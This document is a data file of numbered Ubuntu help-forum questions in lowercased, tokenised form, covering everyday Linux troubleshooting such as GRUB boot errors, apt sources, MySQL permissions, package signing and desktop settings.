284848	can i have the i-beam ( mouse ) cursor more visible in gtk3 apps ?	when the mouse cursor hovers over text ( other than hypertext ? ) that can be edited or copied , the cursor appears as an i-beam insertion bar . in gtk2 , it 's possible to alter the width and color of the i-beam by merely editing a couple of lines in my theme 's gtkrc file like this : gtkwidget : :cursor-color = `` red '' gtkwidget : :cursor_aspect_ratio = 0.2 is there something similar available for gtk3 themes ? ( apparently such a feature is n't yet available in qt apps . ) i 'm using lubuntu 12.10 .
284850	myisam problem after moving datadir of a mysql database	i recently moved my mysql database data directory from the default location /var/lib/mysql onto a new harddrive located in /media/..uid../mysql , following the steps you can find in several posts . stop the mysql copy the old folder to the new location change the datadir in the [ mysqld ] of /etc/mysql/my.cnf change the two entries in the apparmor configuration adjust the user rights from the data dir restart apparmor restart mysql after those steps i tried to create a new database and it worked , it appears also in the new folder . then i created a new innodb table and it also worked and it places the *frm file into the /mysql/new folder . but then i wanted to create a myisam table into this database , i received the error # 1 - ca n't create/write to file '/media/..uid../mysql/new/tablename.myi ' ( errcode : 13 ) i tried already to set all permission to 777 , as i thought it is a permission problem ( but as innodb can write into that folder , i can not see why myisam can not ! ? ) . for me it looks like that the myisam engine needs somewhere else special permission in order to write it 's files , but i do not know where . first i thought that it is a mounting problem of that new harddrive , but then again - the innodb can create database folders and also create files inside these folders . so , any help is appreciated , if someone had a similar issue after moving a myisam table and could give some hints where to look or what else to try . thanks a lot already in advance !
284852	sublime text 2 wo n't open after install	i just installed sublime text 2 using this guide modified for xubuntu 12.04 . after following the instructions , logging out and back in , sublime was in my application list but it wo n't open . when i try to open it from the terminal i get this message : /opt/sublime_text_2/sublime_text : 1 : /opt/sublime_text_2/sublime_text : syntax error : word unexpected ( expecting `` ) '' ) i 've double checked the two files i created /usr/share/applications/sublime.desktop and /usr/bin/sublime and they are both correct . i 'm not sure what to try next . note : i am a complete and utter novice and followed the instructions blindly so bear with me .
284866	how to install ubuntu touch on tegra 3 ( cardhu ) development board ?	since nexus 7 is based on tegra 3 , i try to install ubuntu touch on cardhu ( nvidia tegra 3 developer board ) follow this instruction , but it ca n't recognized cardhu . i also tried the linux for tegra package from nvidia web , and it stock on booting . is there any other way i can try to flash ubuntu into cardhu ? thanks .
284873	is there wubi.exe that can support ubuntu-12.04.2-desktop-amd64 ?	i have downloaded ubuntu 12.04.2 64 bit , and i tried to install it with wubi . i put the ubuntu iso and wubi in the same folder . when i installed it with wubi , it starts downloading ubuntu-12.04.2-wubi-amd64.tar.xz , which took nearly 2 hours because my internet connection is slow . i did n't face this problem with previous versions of ubuntu . how can i avoid this issue ? is there a version of wubi that can support ubuntu-12.04.2-desktop-amd64.iso with previous version of ubuntu ? screenshot of the issue :
284877	kubuntu can not start normally	kubuntu 12.10 64 bit was installed in my laptop ( thinkpad t430 ) problems : the first time i restart the kubuntu after the installation is fine except the kubuntu logo with gray background picture was n't showed while starting and shutting down instead of showing the current status ( loading or killing something ) , it does n't concern me , but everything goes wrong after the restart after some software upgraded , the system just shuts the screen down after booting ( if it 's a black screen , you can still see some light out from the screen , my laptop does n't release any light at all , so i guess the screen was shut down ) . i tried : however , i can still start kubuntu through `` advanced options for ubuntu '' - > `` ubuntu , with linux 3.5.0.17-generic '' , but when i go to `` ubuntu , with linux 3.5.0.27-generic '' it behaves exactly same as choose `` ubuntu '' directly ( turns screen off ) . i 'm using kubuntu through `` 3.5.0.17-generic '' , i tried to install kdm and chose kdm as default login way , it does n't change anything ( i 'm new to linux , i do n't know if it is good to try this ) . the help i need : what are the meanings of `` linux 3.5.0.17-generic '' and `` linux 3.5.0.27-generic '' , what are the differences between these two options ? how can i start kubuntu by choose `` ubuntu '' instead of choose `` advanced options for ubuntu '' - > `` ubuntu , with linux 3.5.0.17-generic '' ? thanks for any advice and answers .
284881	how to install oovoo on ubuntu 12.04 64 bit	kindly help to install oovoo in ubuntu 12.04 64 bit .
284882	how to make ubuntu service run as specific user	how to make ubuntu service run as specific user ? i created an init.d script and make it start at boot , but sooner i found the service is running as root after reboot . i google and google , people suggest run as a seperate user , so what 's the steps ?
284883	internal server error 500 bugzilla installation	i followed this tutorial in installing bugzilla , i did n't encounter any problem not until i hit localhost/bugzilla in the url . my sites-available/default config is as follows : # scriptalias /cgi-bin/ /usr/lib/cgi-bin/ alias /bugzilla/ /var/www/bugzilla/ < directory /var/www/bugzilla > addhandler cgi-script .cgi .pl options +indexes +execcgi +followsymlinks directoryindex index.cgi allowoverride limit < /directory > # < directory `` /usr/lib/cgi-bin '' > # allowoverride all # options +execcgi -multiviews +symlinksifownermatch # order allow , deny # allow from all # < /directory > and when tailing at var/log/apache2/error.log ( 13 ) permission denied : exec of '/var/www/bugzilla/index.cgi ' failed from comments ... ls -l -rwxr-x -- - 1 root apache2 2.6k feb 20 01:16 /var/www/bugzilla/index.cgi
284886	mouse cursor does not change appearance to indicate a program is launching	i am using lubuntu 12.04 lts . when i click on a icon to launch a program , be it from the start menu or from the panel , the mouse cursor does not change to a spinning circle ( or anything else ) to indicate that a program is launching . for beginners this is a very annoying problem . i have tried to change cursor theme with lxappearance , using either dmz black or white , and it does not solve the problem .
284888	ubuntu one ios photo sync	how do i set up ubuntu one to sync only the latest photos on the iphone , and not all the photos in the photo library ?
284890	keylogger with persian and english keymap on ubuntu	i want to log which characters i use most use in a day and to log all pressed keys in all application . how i do this in ubuntu ?
284891	stty does n't reset with sudo after ctrl + c	let 's say i have following simple php script : misan @ thrope : ~/tests $ cat stty.php < ? php shell_exec ( 'stty -icanon -echo ' ) ; // exit ; $ fh = fopen ( 'php : //stdin ' , 'r ' ) ; while ( ! feof ( $ fh ) ) { $ c = fread ( $ fh , 1 ) ; echo sprintf ( 'char : `` % 02x '' ' , ord ( $ c ) ) , php_eol ; } it executes stty -icanon -echo and waits for user input . i 've got some strange issue : when i run this script with simple php stty.php and press ctrl + c it interrupts properly and stty resets : misan @ thrope : ~/tests $ php stty.php < -- -- -- -- - ctrl + c misan @ thrope : ~/tests $ echo 123 123 but if i run it with sudo , it seems like stty does n't reset it previous settings : misan @ thrope : ~/tests $ sudo php stty.php < -- -- -- -- -- ctrl + c misan @ thrope : ~/tests $ < -- -- -- -- - ca n't see my command , because stty does n't reset misan @ thrope : ~/tests $ misan @ thrope : ~/tests $ why ? p.s . futhermore , if you uncomment exit statement , stty does n't reset without sudo as well . update : debian gnu/linux 6.0 php 5.3.23-1~dotdeb.0 with suhosin-patch ( cli )
284893	unable to locate any package error	just a second before closing my question as duplicated , i want to say i have already looked at the other similar questions and didnt find any appropriate answer : ( . i have a clean set up of ubuntu 10.10 , and i am trying to install packeges by apt-get comamnd . but i can n't do it - e : unable to locate package error is shown . i am trying the following commands : sudo apt-get install build-essential , sudo apt-get insatll update etc . i have looked in another qouestions and saw that it depends on the sources.list file - so i am posting its content : # deb cdrom : [ ubuntu 10.10 _maverick meerkat_ - release amd64 ( 20101007 ) ] / maverick main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //il.archive.ubuntu.com/ubuntu/ maverick main restricted deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //il.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //il.archive.ubuntu.com/ubuntu/ maverick universe deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick universe deb http : //il.archive.ubuntu.com/ubuntu/ maverick-updates universe deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //il.archive.ubuntu.com/ubuntu/ maverick multiverse deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick multiverse deb http : //il.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //il.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //il.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu maverick partner # deb-src http : //archive.canonical.com/ubuntu maverick partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted deb http : //security.ubuntu.com/ubuntu maverick-security universe deb-src http : //security.ubuntu.com/ubuntu maverick-security universe deb http : //security.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse can anyone please help me ? thanks ! !
284895	can not boot into ubuntu	i am trying to install ubuntu 12.04 onto my acer aspire 5735z . i have downloaded and burned the image to a cd ( correctly as per your guide ) . i have set my bios to boot cd first , disabled quite boot , tried switching from ahci to ide , etc . nothing works . i get to a `` boot menu '' where i select boot from cd . it then tells me `` no operating system found '' i have tried everything on these forums as well as others . please help . i want to start using ubuntu instead of windows but i am not getting very far .
284898	insmod error in grub : symbol not found : grub_realidt	i have a dual boot pc with windows 7 and ubuntu . i upgraded from 12.04 to 12.10 and then to 13.04 and since then i have not been able to boot because the pc goes into grub rescue with the error `` file not found '' . i have tried the following steps : set prefix= ( hd0 , msdos5 ) /usr/lib/grub/i386-pc set root= ( hd0 , msdos5 ) insmod linux i get error : symbol not found : 'grub_realidt ' . if i do insmod normal , i get error symbol not found : 'grub_disk_dev_list' i have two partitions containing linux file system : ( hd0 , msdos5 ) and ( hd0 , msdos6 ) . they were mountpoints for / and /boot respectively . i have searched for this error , and found some `` solved '' threads . but all of them are using live usb to get in grub prompt . i do n't have access to one , and was hoping to be able to solve the issue without a flash drive . please help ... thanks in advance .
284902	contextmenu does not work in desktop	i am using ubuntu12.04 , and i install the gnome-classic desktop . after that i removed the package 'nautilus ' , and install the 'thunar ' . however , i found that the context menu does not work anymore . what is the problem ?
284905	why are device mappers deleted during updates ?	my system ( dell xps 14 with 13.04 ) is set up like http : //ubuntuforums.org/showthread.php ? t=2117166 & page=2 using flashcache to cache the /home folder ( located on a slow spinning disk ) on a ssd partition speeding up the i/o . for that a mapper in the location /dev/mapper/ is created . after my last update the mapper was deleted . is this necessary and will it reoccurred in future ? thanks siggi update : after updating to final release of 13.04 the mapper was deleted again.. and even worse it is deleted after every reboot . only taking the write permission did help .
284912	how can i open the `` about gnome '' window ?	i know how find the gnome version via terminal . but is there a command or some other way that opens a window like this ?
284915	ubuntu 12.04-2 on apple xserv early 2008	i have at work several xserv doing nothing , and i want to install ubuntu . i booted from the cd choose efi and edited the kernel option to add nomodeset so it boots normally . then the kernel loaded fine until it hit the ubuntu gui installer which gave me unreadable screen and colors , however i can see the mouse moving and if i hit enter on keyboard the installer jumps to other page in the installation but not readable at all . i tried kernel options : video=vesa and other video modes but still same ! any ideas regarding this ? screen gets like this : another one : here is a youtube video of what happens : if i do not add nomodeset the kernel will load halfway thru and freezes at certain point . if i add nomodeset all works fine except the graphics , even on ubuntu server which suppose to be fully cli mode . ubuntu server 12.10 x64 - xserv 2,1 early 2008
284919	problem installing i-mscp	i have a problem on my ubuntu ... when i try to install i-mscp i get this error : reading package lists ... done w : duplicate sources.list entry ro.archive.ubuntu.com/ubuntu/ precise/multiverse i386 packages ( /var/lib/apt/lists/ro.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages ) w : duplicate sources.list entry ro.archive.ubuntu.com/ubuntu/ precise/multiverse i386 packages ( /var/lib/apt/lists/ro.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages ) w : duplicate sources.list entry ro.archive.ubuntu.com/ubuntu/ precise-updates/multiverse i386 packages ( /var/lib/apt/lists/ro.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages ) w : duplicate sources.list entry ro.archive.ubuntu.com/ubuntu/ precise-updates/multiverse i386 packages ( /var/lib/apt/lists/ro.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages ) w : duplicate sources.list entry security.ubuntu.com/ubuntu/ precise-security/multiverse i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_binary-i386_packages ) w : duplicate sources.list entry security.ubuntu.com/ubuntu/ precise-security/multiverse i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i 've tried to run apt-get update but still the same
284927	apt authentication failure on self-signed package	i did create a gpg key using `` gpg -- gen-key '' , here is the listing : > gpg -- list-keys /home/ < user > /.gnupg/pubring.gpg -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- pub 2048r/99ede0b7 2013-02-05 uid some company sub 2048r/97337d10 2013-02-05 i exported the public key using : > gpg -- output key.pub -- armor -- export 99ede0b7 i signed a deb package using : > dpkg-sig -- sign builder -k 99ede0b7 mypackage.deb i can verify the signing on the same controller : > dpkg-sig -- verify mypackage.deb processing mypackage.deb ... goodsig _gpgbuilder 31c631682d8c1dc833576a283c9a9aa799ede0b7 1366790488 i import the public key on a different controller : > apt-key add key.pub ok > apt-key list /etc/apt/trusted.gpg -- -- -- -- -- -- -- -- -- -- pub 2048r/99ede0b7 2013-02-05 uid my company sub 2048r/97337d10 2013-02-05 but when i verify the package on this new controller the signing is unknown : > dpkg-sig -- verify mypackage.deb processing mypackage.deb ... unknownsig _gpgbuilder 99ede0b7 i must use `` gpg -- import '' to actually verify the package : > gpg -- import key.pub then the verification works : > dpkg-sig -- verify mypackage.deb processing mypackage.deb ... goodsig _gpgbuilder 980cdf084ec87d4c003e020c4b324efb85743c26 1366872932 but when using apt to install the package i get an authentication error : > apt-get install mypackage reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : mypackage 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/12.0 kb of archives . after this operation , 0 b of additional disk space will be used . warning : the following packages can not be authenticated ! mypackage install these packages without verification [ y/n ] ? and i can not figure out why : - ( thx !
284930	install cd hangs	trying to install 32bit x86 xubuntu on sdb . sda has grub , w2000 and fedora-3 . install cd live session works like a charm ( this is why i chose xubuntu based on previous experience with it on usb stick live session an frustration with another distro ) , but my install fails . install cd hangs if i chose `` install '' option in opening screen . if i doubleclick on install cd in live session it gets to the point of asking me to unmount or not sda . regardless of my answer it hangs anyway . i tried it with sdb partitioned and no ext filesystem created and with ext3 filesystem created , at least 6gb . i would like to install xubuntu on sdb1 ( 6gb of ext3 ) and use my existing grub on sda to chose to boot to xubuntu on sdb1 . but i have no problem to install grub on sdb mbr and chose bios boot to sda grub or sdb grub . the main thing is that i 'd like to leave sda alone . would a brute force approach of pulling the wire off from sda hard drive and use the xubuntu install cd ? is there a more elegant solution ? thank you , janos p.s . i browsed related answers without solving my problem .
284935	wireless connection problem	i need help in setting up wireless connection in ubuntu 12.04 lts . not detecting any drivers , in spite of having a modem and a router .
284939	how to cat the `maas key` of a user via `maas shell` ?	when we login to maas web ui , we can see the user maas key in the preferences page . is there any chance to cat it as a text via console command maas shell ? !
284942	how to instruct apt-get and/or synaptic to install from source code ?	as i asked in the title , i would like to know how to setup synaptic or how to instruct apt-get to install/upgrade software exclusively from source . i mean , apt-get/synaptic install only pre-compiled packets . i would like to setup the `` building all '' like portage in gentoo . is this possible ? if yes , how ?
284949	ca n't boot ubuntu after replacing os x tiger with ubuntu in a macbook pro	after i installed ubuntu on a macbook pro replacing os x tiger , when i try to boot ubuntu i only get a folder with a question mark as if ubuntu is not found . how do i fix this ?
284951	inspiron 7520 suspend/hibernate problem ubuntu 64 bit	i am currently using ubuntu 12.10 64 bit , booting with uefi . i am experiencing a problem since i have begun to use my computer linux . the problem is that the timer goes wrong when i awake my computer from hibernate or suspend or even hybrid suspend . i receive a pm error when i awake it . i tried something , i let my battery goes to zero . the laptop tried to go on hibernate but kept awaking . so i have concluded that the timer is wrong . is there anything i can do to fix this problem ?
284952	install qtserialport library	i want to install qtserialport in precise1-ubuntu . i got the source directory using git . next i download lib-qt4-dev and qmake . i ran qmake . it works fine . but , make fails with the following error : cd src/ & & make -f makefile make [ 1 ] : entering directory `/home/saman/5.0.1/serialportsrc/qtserialport/src' cd serialport/ & & make -f makefile make [ 2 ] : entering directory `/home/saman/5.0.1/serialportsrc/qtserialport/src/serialport' make [ 2 ] : nothing to be done for `first ' . make [ 2 ] : leaving directory `/home/saman/5.0.1/serialportsrc/qtserialport/src/serialport' make [ 1 ] : leaving directory `/home/saman/5.0.1/serialportsrc/qtserialport/src' cd examples/ & & make -f makefile make [ 1 ] : entering directory `/home/saman/5.0.1/serialportsrc/qtserialport/examples' cd cenumerator/ & & make -f makefile make [ 2 ] : entering directory `/home/saman/5.0.1/serialportsrc/qtserialport/examples/cenumerator' g++ -wl , -o1 -o cenumerator main.o -l/usr/lib/i386-linux-gnu -lqtgui -lqtcore -lpthread main.o : in function `qlist < qserialportinfo > : :free ( qlistdata : :data* ) [ clone .isra.1 ] ' : main.cpp : ( .text+0x47 ) : undefined reference to `qserialportinfo : :~qserialportinfo ( ) ' main.o : in function `qlist < qserialportinfo > : :detach_helper ( int ) ' : main.cpp : ( .text._zn5qlisti15qserialportinfoe13detach_helperei [ qlist < qserialportinfo > : :detach_helper ( int ) ] +0x68 ) : undefined reference to `qserialportinfo : :qserialportinfo ( qserialportinfo const & ) ' main.cpp : ( .text._zn5qlisti15qserialportinfoe13detach_helperei [ qlist < qserialportinfo > : :detach_helper ( int ) ] +0xc3 ) : undefined reference to `qserialportinfo : :~qserialportinfo ( ) ' main.o : in function `main ' : main.cpp : ( .text.startup+0x5e ) : undefined reference to `qserialportinfo : :availableports ( ) ' main.cpp : ( .text.startup+0x10f ) : undefined reference to `qserialportinfo : :isbusy ( ) const' main.cpp : ( .text.startup+0x16b ) : undefined reference to `qserialportinfo : :hasproductidentifier ( ) const' main.cpp : ( .text.startup+0x1bb ) : undefined reference to `qserialportinfo : :hasvendoridentifier ( ) const' main.cpp : ( .text.startup+0x212 ) : undefined reference to `qserialportinfo : :manufacturer ( ) const' main.cpp : ( .text.startup+0x24a ) : undefined reference to `qserialportinfo : :description ( ) const' main.cpp : ( .text.startup+0x282 ) : undefined reference to `qserialportinfo : :systemlocation ( ) const' main.cpp : ( .text.startup+0x2ba ) : undefined reference to `qserialportinfo : :portname ( ) const' main.cpp : ( .text.startup+0x644 ) : undefined reference to `qserialportinfo : :productidentifier ( ) const' main.cpp : ( .text.startup+0x674 ) : undefined reference to `qserialportinfo : :vendoridentifier ( ) const' collect2 : ld returned 1 exit status make [ 2 ] : *** [ cenumerator ] error 1 make [ 2 ] : leaving directory `/home/saman/5.0.1/serialportsrc/qtserialport/examples/cenumerator' make [ 1 ] : *** [ sub-cenumerator-make_default-ordered ] error 2 make [ 1 ] : leaving directory `/home/saman/5.0.1/serialportsrc/qtserialport/examples' make : *** [ sub-examples-make_default-ordered ] error 2 although make fails , i can now include qtserialport header to my project . and about the failure , i checked main.cpp , it includes serialportsrcinfo.so , this .so file has already been generated when qmake was called . how can i fix the problem ?
284956	dim inactive compiz ( set speed of the effect )	i just enabled the dim inactive effect in compiz on ubuntu 13.04 and my question is : how can i speed up this effect ? with this i mean how can i reduce the time it takes to make the background less bright ?
284957	vi , getting multiple `` sorry , the command is not available in this version ... '' after reinstall	from my .vimrc , getting : line 16 : e319 : sorry , the command is not available in this version : filetype on line 17 : e319 : sorry , the command is not available in this version : filetype plugin on line 18 : e319 : sorry , the command is not available in this version : filetype indent on line 21 : e319 : sorry , the command is not available in this version : syntax on line 45 : e319 : sorry , the command is not available in this version : match extrawhitespace /\s\+ $ / line 46 : e319 : sorry , the command is not available in this version : autocmd bufwinenter * match extrawhitespace /\s\+ $ / line 47 : e319 : sorry , the command is not available in this version : autocmd insertenter * match extrawhitespace /\s\+\ % # \ @ < ! $ / line 48 : e319 : sorry , the command is not available in this version : autocmd insertleave * match extrawhitespace /\s\+ $ / line 49 : e319 : sorry , the command is not available in this version : autocmd bufwinleave * call clearmatches ( ) i can remove the lines , but i would rather know what i am really missing or need upgrading that is causing this as this file worked for me before .
284959	how to install newest dovecot stable when ubuntu repository is old ?	this is a bit of a dumb question , but how do i install the newest stable of dovecot on ubuntu 12.04 lts server ? i 'm still a bit new to ubuntu and linux in general . the newest stable is v2.2.1 , but in the ubuntu repository it 's only v2.0.19 . the backports repository is only at v2.1.7-2 . i would rather not install from source since it seems like huge trouble when trying to upgrade and handling old dependencies . i found their stable deb packages here , but how does it relate to the command : apt-get install dovecot-imapd dovecot-pop3d does the deb file contain both dovecot-imapd and dovecot-pop3d or whatever else i need to install dovecot ?
284961	bypass all email accounts through postfix server	i have a third party email service . i want to bypass all user emails to my linux mail server and need to keep backup of all sent and recieved emails .
284968	darkice : no current section [ 0 ]	i was trying to follow the instructions here to set up a local audio stream , but when i tried to start darkice , it gave the error darkice : darkiceconfig.cpp:137 : no current section [ 0 ] and quit . what does that mean ? update : ... i did n't copy the config file right . i fixed it , and now it works .
284969	two finger swipe to go back in browser in precise ?	have tried various things but i ca n't find a good solution to enable two finger swipe to go 'back ' in a browser . two finger vertical scrolling works fine , but it 's side-swipe back/foward i 'm after . ginn seems like it might do it , but it fails in precise with unity saying 'error subscribing to gestures ' , and the fix seems complicated - seems to involve fiddling with source and recompiling . easystroke is another possibility , but it requires a mouse button to be held down and so does n't give proper two finger swipe , this is n't what i 'm after . in case it 's relevant , my touch pad is identifed as 'cyps/2 cypress trackpad' thanks !
284971	how to run php web application in lamp server and mysql connection also	i need your help . 1.i wanted to install php , mysql and server appache like.. 2.how to run php web application in server ? 3.how to connect php web application into mysql .
284975	thunderbird : keep inbox clean	i tried to find a thunderbird plugin which can do this : display a button on the top of the message ( while reading , not composing ) `` move message to folder ' ... ' '' . the plugin checks the `` from '' header of the mail and remembers ( or searches ) where the last mails of this sender were moved to . in about 95 % of my cases the plugin could guess the correct folder . the algorithm is quite easy : move the mail to the folder , which was used the last time for this from-address . this could help to keep the inbox clean . i know a lot of people which have a huge inbox folder because they are to lazy ( or busy ) to move mails into subfolders . i do n't like the manual way : right click , move message to folder `` ... '' . and the archive feature of thunderbird does not help me . i want to keep mails separated . any idea how to keep the mail inbox clean by moving mails to subfolders in a way that is easy and fast ? update filters do n't solve my problem : i want to see all mails in my inbox . after reading and handling the mail i want to move it to an other folder .
284978	file/folder permissions lost after restart hence file not displayed in file browser	after restarting my laptop , i have observed that some of the files in my hard drive disappeared on their own , and they seem to reappear after multiple restarts . this has happened mostly to files which have been downloaded from the internet ( video/movie files and folders ) , but there is not a pattern as such to this incident , and it happens randomly . after a bit of searching i tried to locate the files from the terminal , and found that the files are still there , but all of them have their permissions lost and shown as ' ? ' . if i changed the permissions manually , the missing files would probably show in the gui file browser , but if i have n't done anything why should i revert to the old permissions ? i am running ubuntu 12.10 . please help me to understand this problem .
284981	firefox does n't launch in ubuntu 13.04	firefox starts when i use sudo in the terminal , but not from the launcher . all the other apps work like a charm , just not firefox . how can i fix this ?
284983	print text between two xml tags	consider the following excerpt from a large xml file : ... < servername somekey= '' false '' anotherkey= '' 0.05 '' thirdkey= '' 0.04 '' > < default > blah.blah.blah < /default > < region name= '' us '' > us.blah.net < /region > < region name= '' eu '' > eu.blah.net < /region > < region name= '' il '' > il.blah.net < /region > < /servername > ... how do i print the the lines between the opening tag < servername ... > and the closing tag < /servername > ?
284988	how to turn off airplane mode ? ( 12.10 )	i have a problem get the wifi to work in ubuntu 12.10 . when i use gnome network manager it indicates that wireless is disabled by hardware switch while it is not . in the network settings panel in the wireless section , it only shows the hardware address and the switch is off and it 's disabled so that i ca n't change the status to on . at the bottom there is an airplane mode switch which is on , and turning it off has no effect and it immediately turns back on . i use a sony vaio ca series laptop
284991	my kubuntu box has been dropping out of x intermittently with a kernel panic . how do i find out what it means ?	here 's a literal screenshot : see `` kernel panic - not syncing : attempting to kill init ! '' again , this is n't a boot problem ; it happens while i 'm using the pc , or i believe sometimes overnight . i 've done a memory test and confirmed my memory is fine , so i 'm wondering what to try next . should i try a different kernel ? this is on a lenovo t520 . i ca n't think of any recent hardware changes that could be related .
284992	run both at the same time , windows and ubuntu	i had read in some sites that it is possible to run two os'es in the same machine at the same time through a virtual machine software , so you can switch virtual terminals with keyboard hotkeys and be on ubuntu browsing the web and switch to windows to write a document , no need to restart and choose the other os , both running simultaneously . so first thing : is it true ? if it is indeed possible how can i do that ? and what are the drawbacks ? sorry if i misunderstood something about virtual terminals , although i do n't know a lot about them and how they work or even for what purpose they exist . obs . : i noticed that my motherboard offers intel virtualization technology , that says that this feature makes use of a hardware design that makes better virtualization ( or helps , do n't know ) than software virtualization .
284998	how to run windows executable files	having shifted from windows a while ago , there are still some applications that i wish were also designed to run on linux platform . therefore , how can the executable files of such applications be enabled to run on pangolin precise if there is any chance ?
285002	how can i create a new partition scheme to prevent total file system corruption ?	this is my first time confronting partitioning for this purpose , and i use ubuntu only.. however ... i just recently broke my ubuntu by playing around with firefox from the terminal.. think i was playing with firefox in root , learning commands and such , and that did it ( ubuntu would load but would no longer offer graphical program selection bars like unity or any of my firefox addon settings ... just a blank desktop with my home directory still operational ) .. it 's no biggie though cause i 'd backed everything previously since i was already in the process of migrating away anyway ; with two brand new ssd 's at 128gigs each : ) . i 'd been using two 32gigs ssd 's in the previous ( raid 0 , cause it 's so faaaaaaassst ) configuration.. however this made me worry about being able to repair something like this should it not happen at such a fortunate time , again.. so i looked into file system partitioning and it looks a great for this.. there were also mismatched file system issues i had from the first ubuntu install ( first drive was ext4 , other fat32 , raid volume undefined , which caused grub interference ) but it worked fine regardless and ubuntu saw both disks as one volume.. but now , both brand new disks and the entire raid volume are are reset in gparted to ext4 filesystems.. so it seems i could use some suggestions on how to best break down 250 gigs of space to seperate the operating system files from where the data i generate can go , and how i can get the best set up for this ? do you create one primary partition using only ( ? ) the ubuntu installer ? how does seperating the system files and data files into partitions actually function as one operating system ( cause i think of partitioning as creating two seperate operating systems to run separately from one disk ) ? do you create one primary partition with the /boot on it and logical partitions all the way down to seperate the rest and decide on how much space goes to which to make it work as one operating system ? is there a best space management system that could boost performance or something else i can do for performance ? ? and what about encryption ? ? ? can i encrypt data correctly doing this and can i do it in the ubuntu installer or do i have to do something else to encrypt all the data the system generates ?
285003	custom thumbnailers do n't work in gnome	i wanted to have .chm and .epub files thumbnailed in nautilus . i followed instructions presented here : http : //askubuntu.com/a/266323/119832 with no effect . provided thumbnailers and their installation scripts did n't change anything . so i created my own script and tried to pass it into configuration . still no effect . i 've tried *.thumbnailer file approach : $ cat ./.local/share/thumbnailers/chm.thumbnailer [ thumbnailer entry ] exec=/home/mariusz/pobrane/nds-thumb/chm-thumb % i % o mimetype=application @ vnd.ms-htmlhelp ; and configuring gnome directly : $ gconftool-2 -s `` /desktop/gnome/thumbnailers/application @ epub/enable '' -t boolean 'true' $ gconftool-2 -s `` /desktop/gnome/thumbnailers/application @ epub/command '' -t string `` /usr/bin/epub-thumbnailer % i % o % s '' and files still have this icon : i 've tried to undo customizations : $ rm -rf ~/.gconf/desktop/gnome/thumbnailers $ gconftool-2 -- recursive-unset /desktop/gnome/thumbnailers and removed thumbnails already stored in ~/.thumbnails . both images and videos are thumbnailed properly . os and gnome version : $ gnome-shell -- version gnome shell 3.4.1 $ cat /etc/issue ubuntu 12.04.2 lts \n \l is there a way to solve this problem or to debug it ?
285011	access with vino without ask me permissions	i have ubuntu 12.10. how i can access my computer remotely with vino , without ask me permissions on the server ? i need something like logmein , or how i can stop vino asking me for permissions ?
285013	ubuntustudio installer does not allow partition resize ?	i 'm running fc18 + virtualbox and trying to install ub.studio 12.10 64bit . it works `` fine '' as live cd ( except jackd , the main audio server , is n't working.. supposedly there is a fix for this ) but when trying to install it i have problems.. the installer demands 8.5gb of disk space . i gave it 12gb thru virtualbox ( allocating as needed ; not all up front ) . yet without custom partitioning ( ie clicking 'something else ' ) it halts shortly into the installation , saying there is not enough space . when the partition dialogue comes up , if i select the device ( here , /dev/sda ) and click 'new partition table ... ' i 'm not allowed to modify it b/c it is 'in use by lvm volume group ubuntu-studio . ' i can not change the sizes of , or delete/add partitions , as the plus/minus keys are grayed out . all i can change are partition formats , whether partition is formatted , and its mount point . so , in order to get the installer to work , i had to switch the home , root , and swap volumes , as that was the only thing the installer would let me do . now i have an ~8gb root volume , ~4gb home volume , and a ~255mb swap space . it 's actually not bad for my purposes , but it sure would be nice if i could , myself , change the sizes of each partition at install time.. any way to do this ? thanks !
285015	e : malformed line 57 in source list /etc/apt/sources.list ( dist parse )	hi guys i 've just got this error message when i opened update manager : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) any ideas how to solve this problem ?
285017	permission denied creating file on ubuntu server ( amazon ec2 instance )	sudo has been working fine for installing applications and running scripts , but when i try and create a file i am getting a `` permission denied '' . i have tried : sudo cat > file.conf and sudo echo `` test '' > test.conf both are failing . i loaded the default ubuntu server instance ami from amazon ec2 , i am guessing there is some special permission stopping me from creating file ? a security consideration i assume .
